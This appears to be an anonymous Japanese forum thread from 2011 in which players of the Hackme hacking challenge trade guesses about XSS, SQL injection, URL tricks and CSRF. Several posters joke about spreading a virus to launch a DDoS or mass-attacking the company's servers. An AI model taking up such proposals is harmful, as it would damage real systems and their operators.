【Hackme】ハッキング力検定サイトHackme Lv2
|
|
|
2 :名無しさん@お腹いっぱい:2011/02/25(金) 12:53:44.86
ん
3 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:49:23.73
>>1乙
4 :名無しさん@お腹いっぱい。:2011/02/25(金) 13:51:00.10
スレ立て乙です。
5 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:00:42.53
どうしようもない豚が多すぎる
6 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:02:00.45
乙
7 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:03:07.74
前スレ>>990
何正解ばらしちゃってんだよwwwwwwwwwwwwwwwwwwwww
何正解ばらしちゃってんだよwwwwwwwwwwwwwwwwwwwww
8 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:04:13.26
9 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:04:15.98
答え見て得意げにしてるやつアホだな
10 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:05:52.23
ネタバレしたら代表取締役が怒るぞ
11 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:07:12.31
なんかおかしな社長で面白いな
でもみんな多少スキルアップというか考える事に対して成長した感が楽しい
俺はガチゲイプログラマだからお前らと成長していきたいんだよね
でもみんな多少スキルアップというか考える事に対して成長した感が楽しい
俺はガチゲイプログラマだからお前らと成長していきたいんだよね
12 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:08:32.87
そろそろ本気出してLv5フルボッコにしないか?
13 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:09:58.45
みんなでf5おせばいいとおもうよ
14 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:10:00.99
自分でサーバー管理してない人がこのゲームやって何の利益があるんだろう…
他人のサーバーに向けてやったら捕まるし。
かくいう俺もレン鯖だがw
他人のサーバーに向けてやったら捕まるし。
かくいう俺もレン鯖だがw
15 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:10:53.37
16 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:11:21.15
にしてもログイン画面で他人のログイン履歴見れるのも怖いな
17 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:11:35.87
>>前975
IE6だとdocument.locationが動かない。代わりに、location.href。
IE6だとdocument.locationが動かない。代わりに、location.href。
18 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:12:30.04
Lv5クリアしたら称号は情報操作(ウィザード)とか論理崩壊(ロジックシーカー)とかになんの?一方通行みたいな感じで
19 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:13:04.35
>>8
ネタをネタと(ry
ネタをネタと(ry
20 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:15:09.69
>>15
無いに等しいが、今のところ発見されている現象。
/Lv5/login or /Lv5/login/ どちらでも動く。
/Lv6/ は /Lv5/ に転送。
他になんかあったっけ? ちょっとずつ、まとめていかないか。
無いに等しいが、今のところ発見されている現象。
/Lv5/login or /Lv5/login/ どちらでも動く。
/Lv6/ は /Lv5/ に転送。
他になんかあったっけ? ちょっとずつ、まとめていかないか。
21 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:25:09.75
>/Lv5/login or /Lv5/login/ どちらでも動く。
/Lv5/login? でも動くし
/Lv5/login?name=hoge&password=fuga でも動く
/Lv5/login? でも動くし
/Lv5/login?name=hoge&password=fuga でも動く
22 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:27:00.89
lv5は時間経過とともに
ウィザード -> ハッカー -> 仮ハッカー -> チーター
くらいじゃねえの
ウィザード -> ハッカー -> 仮ハッカー -> チーター
くらいじゃねえの
23 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:27:30.85
Twitterから。
@shiracha
白茶利休
0x82はSJISだよね。なんだっけ。。。UTF-8の時。冗長エンコードのやつとか色々あったのは覚えてるんだけど #hackme
@shiracha
白茶利休
0x82はSJISだよね。なんだっけ。。。UTF-8の時。冗長エンコードのやつとか色々あったのは覚えてるんだけど #hackme
24 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:28:34.65
ごめん、順番が前後した。
@shiracha
白茶利休
なんかLv5のフォームってUTF-8の不正文字列はそのままvalueに返してくるんだからそれでXSS出来そうな気がする。こういう時ってどうやるんだったっけ・・・・・・。 #hackme
@shiracha
白茶利休
なんかLv5のフォームってUTF-8の不正文字列はそのままvalueに返してくるんだからそれでXSS出来そうな気がする。こういう時ってどうやるんだったっけ・・・・・・。 #hackme
25 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:29:05.09
>>22
ネトゲチーターのレベルはLV4程度じゃなくてもっと高いぞw
ネトゲチーターのレベルはLV4程度じゃなくてもっと高いぞw
26 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:31:14.83
27 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:32:24.30
28 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:36:12.73
末尾に「?」付けても動くのは仕組み的に分かるんだけどねー。
ちなみに
Lv5/login//
Lv5//login/
は弾かれた。ってことはlogin/以下の何かを利用すると思うんだけど・・・。
ちなみに
Lv5/login//
Lv5//login/
は弾かれた。ってことはlogin/以下の何かを利用すると思うんだけど・・・。
29 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:36:45.33
LV5解けた
バッファオーバフローだ
バッファオーバフローだ
30 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:37:31.54
>>29
いつの時代だよ
いつの時代だよ
31 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:39:21.96
アクセスバイオレーションですね。わかります。
32 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:40:11.61
20>>
Lv5で動く↓
http://hackme.netfire.jp/Lv5/login
http://hackme.netfire.jp/Lv5/login/
http://hackme.netfire.jp/Lv5/index
http://hackme.netfire.jp/Lv5/index/
パラメータを配列にして送ると「文字列を…」はLv4以下でも同じ
「-」や「%0a」を蹴らないのもLv4以下でも同じ
>>24
この画面でXSSしても意味ないような?
そもそもLv4以下でも不正文字列はそのままvalueに返したような
>>23
Lv5は文字コードだ!って決め打ちして色々試したけどどれも駄目だった
俺のやり方が間違ってるだけかな…
Lv5で動く↓
http://hackme.netfire.jp/Lv5/login
http://hackme.netfire.jp/Lv5/login/
http://hackme.netfire.jp/Lv5/index
http://hackme.netfire.jp/Lv5/index/
パラメータを配列にして送ると「文字列を…」はLv4以下でも同じ
「-」や「%0a」を蹴らないのもLv4以下でも同じ
>>24
この画面でXSSしても意味ないような?
そもそもLv4以下でも不正文字列はそのままvalueに返したような
>>23
Lv5は文字コードだ!って決め打ちして色々試したけどどれも駄目だった
俺のやり方が間違ってるだけかな…
33 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:40:32.87
Lv3のrootパスがMD5でそこから解けねー
34 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:41:40.00
>>33
MD5じゃないだろ
MD5じゃないだろ
35 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:41:46.20
>>28
それっぽいの付けてみたが、ダメだった。他になんか無い?
/Lv5/login/.htaccess
/Lv5/login/index.html
/Lv5/login/auth.html
/Lv5/login/join.html
それっぽいの付けてみたが、ダメだった。他になんか無い?
/Lv5/login/.htaccess
/Lv5/login/index.html
/Lv5/login/auth.html
/Lv5/login/join.html
36 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:42:54.88
37 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:43:04.18
38 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:44:28.88
39 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:45:05.15
これさー、本物の脆弱性用意してくんないと、ただのクイズだよな・・・
せめて、Lv2なら本物のDBに通す、Lv4ならBOTが一定時間毎に本当にログオンする、位やってほしい
手法までは、セキュリティをちょっとでもかじった人間なら、これはSQLインジェクションだな、これはXSSだな、
って気づく位おおっぴらなんだから、あとは実際にそれが実行できるかどうかのディティールじゃんか。
そのディティールで嘘があったら、もうただの当てっこクイズだよな・・・
せめて、Lv2なら本物のDBに通す、Lv4ならBOTが一定時間毎に本当にログオンする、位やってほしい
手法までは、セキュリティをちょっとでもかじった人間なら、これはSQLインジェクションだな、これはXSSだな、
って気づく位おおっぴらなんだから、あとは実際にそれが実行できるかどうかのディティールじゃんか。
そのディティールで嘘があったら、もうただの当てっこクイズだよな・・・
40 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:45:15.29
>>33
確か、ハム速のコメ欄にヒントがあったような。
確か、ハム速のコメ欄にヒントがあったような。
41 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:45:21.58
xssじゃなくてsqlやってやれば
42 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:46:22.83
これもしかしてNetfire社内のどこかにID書いたメモが貼ってあるんじゃね?
43 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:46:32.20
>>39
本物の脆弱性残して本当にハックされて回復できなくなったらどうすんのよ
本物の脆弱性残して本当にハックされて回復できなくなったらどうすんのよ
44 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:47:45.99
問題がログインだけってのがおかしいんだな。
Lv2なら、ログインしたはいいけど、存在しないIDかパス使ってるわけだから、
そっからパス変更するなり、DB見て何か貴重な情報抜き出すなり、そこまでやって欲しい
Lv2なら、ログインしたはいいけど、存在しないIDかパス使ってるわけだから、
そっからパス変更するなり、DB見て何か貴重な情報抜き出すなり、そこまでやって欲しい
45 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:48:57.77
>>43
仮にもセキュリティ会社なんだから、どこまで穴を開ければ、どこまでされるかはわかるでしょ
仮にもセキュリティ会社なんだから、どこまで穴を開ければ、どこまでされるかはわかるでしょ
46 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:50:23.60
47 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:50:50.96
鯖を外部に公開すると、PHPの管理ページとか、MySQLの管理ページとか
一般的には外部に公開しちゃいけないページをひたすらスキャンしてくるbotみたいなのあるじゃん?
(普通に設定してれば全部404で返すわけだけど)
あれ、どんなツールを使ってるのかしらんが、Lv5に試してみたいな。
だれかツール名わかる人いない?
一般的には外部に公開しちゃいけないページをひたすらスキャンしてくるbotみたいなのあるじゃん?
(普通に設定してれば全部404で返すわけだけど)
あれ、どんなツールを使ってるのかしらんが、Lv5に試してみたいな。
だれかツール名わかる人いない?
48 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:51:48.61
49 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:53:34.04
50 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:53:58.41
51 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:54:32.84
winnyでウイルスばらまいて一斉にDDOS攻撃しかけるってのは?
52 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:54:40.34
セキュリティ会社なんてカスだってことだけはわかった
53 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:55:27.01
54 :名無しさん@お腹いっぱい:2011/02/25(金) 14:56:17.41
lv2わかんね
55 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:56:26.43
56 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:57:56.85
57 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:58:23.75
海外のガチハッカー呼んでこようぜ
58 :名無しさん@お腹いっぱい。:2011/02/25(金) 14:59:28.20
むかーしのハッキングゲーム思い出したのは俺だけ?
(最初に成績簿書き換えたり、最後の方で銀行侵入するやつ)
(最初に成績簿書き換えたり、最後の方で銀行侵入するやつ)
59 :名無しさん@お腹いっぱい。:2011/02/25(金) 15:14:41.89
海外から作りが適当すぎるってそう叩きくらうぞw
60 :名無しさん@お腹いっぱい。:2011/02/25(金) 15:17:21.66
Lv5はサーバールームに殴りこみハック
61 :名無しさん@お腹いっぱい。:2011/02/25(金) 15:19:12.38
ガチハッカーを呼んでnetfireのホームページがハッキングされるのを見てみたい
62 :名無しさん@お腹いっぱい。:2011/02/25(金) 15:21:46.12
さて、ネットファイアに会社訪問&就職してくるかw
63 :名無しさん@お腹いっぱい:2011/02/25(金) 15:24:55.16
lv2教えて
64 :名無しさん@お腹いっぱい。:2011/02/25(金) 15:25:38.64
>>63
自分でかんがえろカス
自分でかんがえろカス
65 : [―{}@{}@{}-] 名無しさん@お腹いっぱい。:2011/02/25(金) 15:47:03.91
TIE55/09/23がパスワードと思ったけど違ったようね。
66 :名無しさん@お腹いっぱい:2011/02/25(金) 16:54:06.75
そろそろネタバレしてもいいんじゃないか?
レベル2が分かったくらいで、次の3が解けんだろww
ぜひ、教えてやれ
レベル2が分かったくらいで、次の3が解けんだろww
ぜひ、教えてやれ
67 :名無しさん@お腹いっぱい。:2011/02/25(金) 16:58:56.13
今見たらLv4が210人もいてワロタw
昨日までは50人くらいしかいなかったのにw
昨日までは50人くらいしかいなかったのにw
68 :名無しさん@お腹いっぱい。:2011/02/25(金) 16:59:33.80
そろそろってなんだよw社内会議かよw
69 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:01:27.46
> Congratulations!
...
> ミッションクリア!ちょっと簡単でしたかね?
どないなっとんねん…
...
> ミッションクリア!ちょっと簡単でしたかね?
どないなっとんねん…
70 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:02:38.97
この企画は、この会社にとってプラスになっているんだろうか・・
71 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:04:20.67
まだLv7が404のままだが大丈夫なのか?Lv6でエンディングを見られるということなのか?
72 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:05:23.36
73 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:06:40.45
Foxさんお疲れさまでした
74 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:08:18.44
Lv4でURLに?が付くのは自分ちのブラウザーがやってることなんだよな?
ボタンでGETすると自動的に付くであってる?
ボタンでGETすると自動的に付くであってる?
75 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:09:59.33
76 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:12:36.85
77 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:13:58.23
78 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:15:07.77
>>75
ここでLv4の判断基準がネタバレされてたからな
ここでLv4の判断基準がネタバレされてたからな
79 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:18:26.32
Lv3,Lv4も最初の数十人が本当にクリアした奴らだな
80 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:20:28.30
81 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:24:39.03
>>79
どっちもまだ名前が表示されたころが本物だね
どっちもまだ名前が表示されたころが本物だね
82 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:26:51.18
83 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:28:27.29
84 :a36 ◆K0BqlCB3.k :2011/02/25(金) 17:29:21.87
これから始めます
85 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:29:55.88
document.location
じゃなくて
location.href
を使うのが正解だったんじゃないの
じゃなくて
location.href
を使うのが正解だったんじゃないの
86 :名無しさん@お腹いっぱい:2011/02/25(金) 17:30:53.83
ついにLv5が一人出たな
87 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:31:34.22
/Lv7/は無いから、Lv6が最後なのかしら
88 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:32:50.58
にわかがUA変更したままになると、あちこちのサイトにXSS攻撃を仕掛けまくることになるわけだけど、
その責任はどこにあるんだろ。
UAを変更させるゲームを作った会社も幇助な気が
その責任はどこにあるんだろ。
UAを変更させるゲームを作った会社も幇助な気が
89 :a36 ◆K0BqlCB3.k :2011/02/25(金) 17:38:00.41
>>88
firefoxならhackme専用のプロファイルを作るべきですね。
firefoxならhackme専用のプロファイルを作るべきですね。
90 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:39:05.35
Lv5出てねえよw
焦らせるなよwww
焦らせるなよwww
91 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:40:47.83
92 :名無しさん@お腹いっぱい:2011/02/25(金) 17:41:25.35
>>86
騙されたw
騙されたw
93 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:42:46.83
1+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 12:46:59.89
ハッキングの実力が試せるサイトHackme
http://hackme.netfire.jp/start
力試しにどうぞ
2 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 12:53:44.86
ん
54 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 14:56:17.41
lv2わかんね
63+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 15:24:55.16
lv2教えて
66 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 16:54:06.75
そろそろネタバレしてもいいんじゃないか?
レベル2が分かったくらいで、次の3が解けんだろww
ぜひ、教えてやれ
86+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:30:53.83
ついにLv5が一人出たな
92 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:41:25.35
>>86
騙されたw
ハッキングの実力が試せるサイトHackme
http://hackme.netfire.jp/start
力試しにどうぞ
2 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 12:53:44.86
ん
54 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 14:56:17.41
lv2わかんね
63+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 15:24:55.16
lv2教えて
66 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 16:54:06.75
そろそろネタバレしてもいいんじゃないか?
レベル2が分かったくらいで、次の3が解けんだろww
ぜひ、教えてやれ
86+1 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:30:53.83
ついにLv5が一人出たな
92 :名無しさん@お腹いっぱい [↓] :2011/02/25(金) 17:41:25.35
>>86
騙されたw
94 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:47:09.30
>>88
アクセスログで変なUAだとニヤニヤするくらい
アクセスログで変なUAだとニヤニヤするくらい
95 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:47:46.40
>>91
確かに、自分のUAならともかく、他人のUIをリスト表示するなんて聞いたことないな。
確かに、自分のUAならともかく、他人のUIをリスト表示するなんて聞いたことないな。
96 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:54:07.82
97 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:54:35.07
>>95
10年前まではUAをエスケープ処理しないで表示する掲示板が結構残ってたぞ
10年前まではUAをエスケープ処理しないで表示する掲示板が結構残ってたぞ
98 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:56:32.67
ほんとに、あの90年代を思わせる古くさい掲示板って減ったよなぁ
さみしいなぁ
さみしいなぁ
99 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:58:32.25
淘汰された
100 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:58:39.87
80年代の疑似パソコン通信風ゲームあるよ。
フロッピーだけど。
フロッピーだけど。
101 :名無しさん@お腹いっぱい。:2011/02/25(金) 17:58:43.38
teacupとか出てたと思うんだが。
よく少年ナイフのUA出してた
よく少年ナイフのUA出してた
102 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:01:26.95
103 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:02:35.60
割と最近オミトロン復権してなかった?
理由しらないけど
理由しらないけど
104 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:03:10.08
そろそろ該当してもいい頃だろう
お前らどうしたんだよ
お前らどうしたんだよ
105 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:03:14.04
106 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:04:47.07
UAのログでチャットとかおもしろそう
107 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:06:30.87
>>83
なるほど。
なるほど。
108 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:07:43.27
>>105
なんだか牧歌的だなぁ。なごむwww
なんだか牧歌的だなぁ。なごむwww
109 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:09:00.60
IPでおまえのPCに〜って時代か。懐かしいな。
110 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:09:06.49
>>104
あまりにノーヒントすぎて、みんなテンション落ちてるね。
あまりにノーヒントすぎて、みんなテンション落ちてるね。
111 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:11:43.01
まぁ、実際に10年前というとWinMXが少しずつシェアを伸ばしていた時代で、
WinMX立ち上げている奴を見つけて、脆弱性突いて相手の画面にメッセージを出すぐらいの事はできた。
それでビビって荒しやめた奴もいる。
WinMX立ち上げている奴を見つけて、脆弱性突いて相手の画面にメッセージを出すぐらいの事はできた。
それでビビって荒しやめた奴もいる。
112 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:11:53.22
結局、ほかのレベルとの違いって、URLの末尾に / を付けても動くって事だけ?
113 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:11:57.25
今の時代でもワンクリック詐欺にひっかかるやつなんているんだろうか
むかしは黒バックに赤字であなたのIPは****です。
〜○回目のご訪問〜ブラウザ情報〜みたいなサイトが結構あったのにな
むかしは黒バックに赤字であなたのIPは****です。
〜○回目のご訪問〜ブラウザ情報〜みたいなサイトが結構あったのにな
114 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:14:34.31
115 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:17:22.25
ご丁寧に「個人情報を取得中...」なんてgifアニメまで作ったりしてな
116 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:20:00.94
IEユーザーをターゲットにしてクリップボードの中身を抜いたりな
117 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:22:24.12
ポート0~100まで調べたけど、0と80以外はレスポンスさえ返ってこないよ\(^o^)/httpしかないらしい
118 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:23:11.98
>>110
ガチハックするとBANされるんだから、もう少し何とかして欲しいもんだ
ガチハックするとBANされるんだから、もう少し何とかして欲しいもんだ
119 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:24:04.13
>>117
だからGAEだってw
だからGAEだってw
120 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:25:47.94
まじで、ソーシャルハックなんじゃ無いかと思って、中の人のFacebookのページまで
見たが、ヒントらしきものは無し。
見たが、ヒントらしきものは無し。
121 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:27:12.82
非同期処理に関わる穴って事は無いだろうか。
ボタン連打するとへんな挙動しますみたいな。
ボタン連打するとへんな挙動しますみたいな。
122 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:32:28.23
サイトが軽くなったようなきがする。
lv4に執着してたヤツが他力合格して満足して去っていったなw
lv4に執着してたヤツが他力合格して満足して去っていったなw
123 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:33:48.96
中の人ー、見てるかー!?
見てたらなんか燃料投下してくれー。
見てたらなんか燃料投下してくれー。
124 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:40:23.03
ところでどのレベルもCSRF対策してないんだが、これは日本の伝統なのか?
125 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:44:01.26
>>124
それって、外からどうやって分かるの?
それって、外からどうやって分かるの?
126 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:46:50.80
Lv1の答え教えてくれ
127 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:49:33.31
ソース買ってこい
128 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:50:02.54
qmotas報告乙
中の人の反応無いって事は退社済みかなwww
中の人の反応無いって事は退社済みかなwww
129 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:50:29.98
csrfでlv4までクリアさせてあげれば
130 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:51:21.70
>>124
たとえばどんなん?
たとえばどんなん?
131 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:52:41.07
132 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:53:40.91
>>125
リファラーを変えるか、適当なサイトにログインページをコピー。そこからログイン。
CSRFじゃログイン自体は正しいから何にもならない。せいぜい何も知らない奴にマイピク申請連発させるか「こんにちは!こんにちは!」とか日記に書かせるくらい。
リファラーを変えるか、適当なサイトにログインページをコピー。そこからログイン。
CSRFじゃログイン自体は正しいから何にもならない。せいぜい何も知らない奴にマイピク申請連発させるか「こんにちは!こんにちは!」とか日記に書かせるくらい。
133 :名無しさん@お腹いっぱい。:2011/02/25(金) 18:54:44.65
hackmeにどうやってCSRFすんの?
134 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:04:40.09
1つのIDで重複ログインできるのもセキュリティー的にどうなんだ
135 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:05:27.52
ネタバレでランキングが「総勢~人」にまとめなきゃいけなくなると
法人アカウントの広告効果が無くなっちゃうな
「総勢244人」の横に会社名が出ても何の自慢にもなりゃしない
法人アカウントの広告効果が無くなっちゃうな
「総勢244人」の横に会社名が出ても何の自慢にもなりゃしない
136 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:08:43.52
それはそうとビッグマックがまたまた200円らしいな。
137 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:09:02.74
というかここに載ったところで自慢にもならない
138 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:11:09.29
>>137
たしかに自慢にゃならないなww ささやかな自己満足って感じか。
たしかに自慢にゃならないなww ささやかな自己満足って感じか。
139 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:13:43.66
Lv5の手掛かりがなさすぎる
mod_rewrite?
mod_rewrite?
140 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:15:22.63
>>139
特定のソフトウェアの脆弱性に関する問題だとしたらウザすぎるなー。
特定のソフトウェアの脆弱性に関する問題だとしたらウザすぎるなー。
141 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:16:25.42
ようこそ、foobarさん
直近5件のログイン状況
わろたw
直近5件のログイン状況
わろたw
142 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:23:12.90
143 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:24:49.95
直近50件位だして、ニョキッ ・・・ニョキッ ニョキッ ニョキッ ニョキッ 位みたかったなw
144 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:25:03.60
DDoSが残ってるぞ
145 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:26:30.96
ddosはもうやられて一回落ちてるじゃないかw
146 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:32:40.00
解けなくて切れたアホがやったからBAN祭りになったんだよなw
147 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:32:44.00
あれは個人的なやつだったから、今度はLv5挑戦者全員で本当のDDoSをだな・・・
148 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:34:28.12
広告用の公式アカウントにさらに料金を上乗せして答えを聞き出すというのはどうか?
149 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:44:01.83
DDosでサービス落ちても、ログインは出来んだろww
150 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:44:20.03
こういう煮詰まったときはあれしかないな
151 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:47:47.10
人__人__人__人__人__人__人__人__人__人__人
Σ て
Σ びっくりするほどユートピア! て人__人_
Σ びっくりするほどユートピア! て
⌒Y⌒Y⌒Y) て
Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒
_______
|__ ヽ(゜∀゜)ノ
|\_〃´ ̄ ̄ ヽ..ヘ( )ミ
| |\,.-〜´ ̄ ̄ ω > (∀゜ )ノ
\|∫\ _,. - 、_,. - 、 \ ( ヘ)
\ \______ _\<
\ || ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
\||_______ |
Σ て
Σ びっくりするほどユートピア! て人__人_
Σ びっくりするほどユートピア! て
⌒Y⌒Y⌒Y) て
Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒
_______
|__ ヽ(゜∀゜)ノ
|\_〃´ ̄ ̄ ヽ..ヘ( )ミ
| |\,.-〜´ ̄ ̄ ω > (∀゜ )ノ
\|∫\ _,. - 、_,. - 、 \ ( ヘ)
\ \______ _\<
\ || ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
\||_______ |
152 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:51:33.60
153 :名無しさん@お腹いっぱい:2011/02/25(金) 19:55:31.01
いつのまにかレベル5が2人も
154 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:57:32.87
うあああああああマジだ「該当者」って奴と「なし」って奴が!
155 :名無しさん@お腹いっぱい。:2011/02/25(金) 19:59:35.28
>>153
毎回ドキッとするからやめてくれ。
毎回ドキッとするからやめてくれ。
156 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:00:05.13
157 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:00:44.36
何の進展も見込めないLv5の画面を最大化して2時間も座り続けてる俺はなんなんだ
158 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:01:15.11
>>154
反映されてないとかマジレスするところだった
反映されてないとかマジレスするところだった
159 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:03:12.15
前スレで誰かが言っていたがマジでソーシャルエンジニアリングなんじゃないのか?
スパイ送り込んでゴミ袋に答えを書かせて回収するのが正解じゃないのか?
スパイ送り込んでゴミ袋に答えを書かせて回収するのが正解じゃないのか?
160 :名無しさん@お腹いっぱい:2011/02/25(金) 20:03:55.13
笑
161 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:06:50.17
誰かグルーポンで活躍したハッカーよんで〜
162 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:10:38.83
163 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:13:19.76
LV5の正解:無い
NetFireさえもわからない。
NetFireさえもわからない。
164 :名無しさん@お腹いっぱい。:2011/02/25(金) 20:19:11.44
NetFirが何故クリアしていないのか
それはクリア出来ないからである
それはクリア出来ないからである
